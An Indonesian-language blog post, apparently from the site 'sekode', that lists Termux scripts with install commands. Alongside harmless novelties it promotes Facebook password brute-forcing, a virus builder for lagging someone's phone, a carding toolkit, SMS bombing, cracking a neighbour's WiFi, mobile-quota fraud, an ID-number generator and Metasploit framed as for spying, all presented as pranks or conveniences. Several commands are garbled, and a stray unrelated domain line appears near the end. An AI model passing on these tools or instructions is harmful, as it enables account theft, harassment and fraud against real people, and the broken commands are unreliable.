kumpulan script termux

Script Termux merupakan cara mudah untuk ngejalanin aplikasi termux, karena make Script yang udah jadi. sekode bakal ngebahas beberapa kumpulan Script Termux Terbaru yang udsh dibuat dan lengkap buat lu yang lagi nyari-nyari Script Termux.

Apa itu Termux ?

Termux adalah aplikasi android yang berupa terminal emulator serta linux yang bisa di gunain meskipun hp lu ngga di root. Walaupun ngga di root, termux bisa ngasih hak akses penuh kaya device yang udah di root.

Teruntuk lu yang suka banget utak atik, gw rekomen buat nyoba Aplikasi Termux ini. Selain bisa jadi kesenangan tersendiri, Termux juga bisa dijadikan sebagai media pembelajaran bro sekod. Secara ngga langsung, lu sedikit demi sedikit bakal ngerti apa apa aja yang ada di dalam termux, Mulai dari bahasa pemogrammannya bahkan sampai Kode kodenya.

Untuk bisa ngejalanin Script Termux, lu juga harus paham sama command atau perintah yang bakal digunaun buat ngejalanin program termux, Kalo lu udah paham sama command di termux, lu udah bisa dan malahan dengan mudahnya make aplikasi termux.

Termux juga memiliki manfaat yang sangat berguna seperti menjalankan Bot, Buat Website Statis dan masih banyak lagi.

Buat lu yang mau ngejalanin Kumpulan Script Termux ini, lu wajib punya aplikasi yang bisa diunduh di Google Play Store.

Udah Siap Tempur dengan Kumpulan Script Termux nya ? Kalau udah langsung aja gas.

Persiapan Untuk Script Termux

Untuk bisa ngejalnin Script Termux, lu wajib jalanin Perintah atau Commands yang sangat penting buat kelancaran dalam menggunakan nya.

pertama, sangat diharuskan untuk menjalan perintah berikut ini.

pkg update && pkg upgrade

Alat Pendukung Termux

Berikutnya kalian wajib nginstall tools Pendukung buat termux yang berfungsi untuk Install Kumpulan Script Termux nya nanti.Berikut Command nya:

pkg install git php curl -y
pkg install python2
pkg install apache2

Trik Termux yang wajib diketahui

Termux juga memiliki beberapa trik buat ngemudahin pengguna nya pas lagi ngeoperasiin aplikasi termux.

Berhenti ngejalanin Script Termux, lu bisa gunain tombol

Volume Bawah ( - ) + C 

Secara Bersamaan.

Kemudian kalo mau nampilin Perintah atau Commands Sebelumnya lu bisa tekan tombol

Volume Bawah + P

tentunya dipake secara bersamaan juga.

Buat nampilin Tombol Home, ESC, serta CTRL lu bisa pake tombol

Volume Bawah + Q dipencet secara

Menampilkan Kode Berjatuhan ( Matrix )

Ini ngga terlalu penting sih, tapi lu wajib tau karena ini lumayan keren ngeliat kode kode yang berjatuhan dari atas. Untuk ngejalanin nya bisa menginstall Script ini.

pkg install cmatrix
cmatrix

Kalo muncul perintah buat nginstall, ketik aja tombol y ( Yes )

Ratusan Tools Script Termux

Kita masuk ke dalam Script Termux pertama yang mana didalam Script ini ada Ratusan Tools Script Termux cukup buat ngebantu para pengguna script ini karena cuma nginstall 1 script, kalian bisa dapat ratusan tools termux.

pkg install git
git clone https://github.com/Mrcakil/mrcakil
cd mrcakil
chmod +x tools
./tools

Terima Kasih juga kepada pembuat Script nya yaitu MR Cakil yang udah ngebuat Script sekeren ini.

Main Kereta Api di Termux ? BISA Banget !

Kalian juga bisa ngeliat kereta api dalam tampilan Termux 🤣, menurut gw lucu dan keren si, bisa ngebuat Script termux kek gini. Mungkin gabut creator script nya 😂 dan cukup kreatif juga.

pkg install sl
sl

Bot Facebook – Auto Reaction Post

Bot Auto Reaction Post Facebook ini berguna untuk lu yang mager ngasih reaksi buat post temen kalian di facebook. Kalian bisa pake Bot Facebook ini buat ngasih kalian kemudahan dan ngehemat waktu.

git clone https://github.com/AMVengeance/FB-React.git
chmod +x FB-React -R
cd FB-React
./start

Bot Like Post Teman di Instagram

Mau ngelike Foto teman kalian di Instagram ? Tapi banyak dan mager banget buat ngetap 2 kali ? Tenang, kalian bisa juga pake Bot Love Instagram. Commands nya bisa kalian lihah dibawah.

git clone https://github.com/indogram/indotagram.git 
php indotagram/login.php 

Silahkan Login pake Username sama Password Instagram kalian buat make Script Bot Love Instagram nya.

Sebelum ngejalanin command di atas, kalian install dulu Command berikut ini

pkg install php

Kalo ngga kalian install, script nya ngga akan bisa dipake.

Script Termux NIK & KK Gratis

NIK dan KK juga banyak dibutuhin buat pendaftaran. Disini gw bisa kasih contoh, kalo kalian beli kartu / Sim Card, kalian wajib disuruh daftarin NIK sama KK buat verifikssi kalo lu adalah Pemilik sim card itu.

pkg install php git
git clone https://github.com/IndonesiaSecurity/kkktp
cd kkktp
php kkktp.php

Script Metasploit

Metasploit ( Metaxploit ) adalah tools yang berguna untuk ngeremote pc dan hp orang lain. Biasanya kebanyakan orang gunain untuk ngirim virus dan menyadap.

pkg install curl
curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
chmod +x metasploit.sh
./metasploit.sh

Melacak IP Orang Lain

Kalian penasaran dengan orang yang bikin kesel? atau main Mobile Legends dapet tim bego? Orang tersebut keliatan mencurigakan ? kalian bisa pake tracking ip atau Script Lacak IP di termux, berikut cara install nya.

git clone https://github.com/maldevel/IPGeolocation
cd IPGeolocation
chmod +x ipgeolocation.py
pip install -r requirements.txt
python ipgeolocation.py -m
python ipgeolocation.py -t IPnya

Script Hack Akun Facebook

Disclaimer: Ini cuma untuk media pembelajaran, kesalahan penggunaan bukan tanggung jawab sekode dan merupakan tanggung jawab pengguna script.

Tak bisa dipungkiri bahwa masih banyak orang masih nyari gimana Cara Hack Akun Facebook bahkan sampai saat ini di tahun 2024. Alasan mereka nyari Script Hack Facebook yaitu buat ngambil kembali Akun Facebook yang lupa Password atau di Hack oleh orang.

pkg install python2-dev
apt install wget
dip2 install mechanize
cd/sterage/emulated/0
python2 fbbrute.py
storage/emulated/0/password.txt

Membuat Virus di Termux

Kalian juga bisa buat Virus pake Termux. Kesal sama orang? lu pengen banget ngerjain dia ? Coba aja pake Virus Termux, dijamin ampuh bikin hp doi nge lag total 🤣.

git clone https://github.com/viruz09/CreaterVirus
cd CreaterVirus
python2 creater.py

Untuk ngecopy dan ngirim Virus nya pake perintah ini

cp agents.apk /lokasi/folder

Tools B4J1N94N

Fitur yang ada discript ini yaitu:

  • Nyari CC untuk carding
  • Spam akun gmail work
  • Whois lookup domain,
  • Dan masih ada ratusan tools lainnya
git clone https://github.com/DarknessCyberTeam/B4J1N64Nv5
cd B4J1N64Nv5
sh B4J1N64N.sh

Spam SMS ( Grab )

pkg install python2 git
pip2 install requests
git clone https://github.com/p4kl0nc4t/Spammer-Grab
cd Spammer-Grab
chmod +x spammer.py
python2 spammer.py

Bisa dipake buat ngejailin temen lu yang lagi push rank wkwkw karena bakal kena spam sms dari grab.

Spam SMS Jd.id

Ga jauh beda sama spam sms grab, script termux ini juga punya fungsi yang sama yaitu ngasih spam sms dalam jumlah yang banyak

pkg install php curl
pkg install cURL
curl https://pastebin.com/raw/9BYy1 JVc -o jdid.php
php jdid.php

Script Tembak Kuota XL

Paket murah di kartu lu udah ngga muncul lagi? lu bisa kok tembak paket nya pake Script Termux Tembak Paket

pkg upgrade && update
pkg install git python
git clone https://github.com/albertoanggi/xl-py
pip install -r requirements.txt
chmod +x app.py
python app.py

Bobol Wifi WPA/WPA2 PSK ( ROOT )

Wifi tetanggamu banyak yang nganggur? Pengen Bobol tapi bingung caranya bobol wifinya gimana ? sini sekode bisikin Script Termux yang berguna buat ngebobol wifi tetangga

apt update

apt upgrade

pkg install git

git clone https://github.com/esc0rtd3w/wifi-hacker

cd wifi-hacker

chmod +x wifi-hacker.sh

Hack Facebook Target !

Script Termux yang ini beda dengan Script Hack FB sebelumnya yang make sistem Brute ( Acak Password ) Script Termux Hack FB ini make sistem TARGET! Berikut cara nginstall nya.

apt update && apt upgrade
apt install git
apt install python2
pip2 install mechanize
git clone https://github.com/FR13ND8/BRUTEFORCEnew,
cd BRUTEFORCEnew
sh new.sh

Script Termux Auto Visitor Blog

Script ini bisa ngepush pengunjung blog lu dan naikin Peringkat Ahrefs Blog.

pkg install git
git clone https://github.com/sandaizer/autosans
cd autosans
php autosans.php

silahkan masukin url artikel blog lu, bukan url homepage ya.

NOTE! Kumpulan Script Termux kemungkinan akan bertambah dan akan diperbaharui diartikel ini.

pafikotatarogongkidul.org

Kesimpulan

Script Termux merupakan cara mudah buat ngoperasiin aplikasi termux karena ga perlu lagi ngebuat script sendiri dan make script termux. Silahkan gunain Script termux sesuai ama kebutuhan lu saat ini.

Terima Kasih udah baca artikel sekode yang ngebahas **Kumpulan Script Termux kalo masih ragu boleh lah tanyain di kolom komentar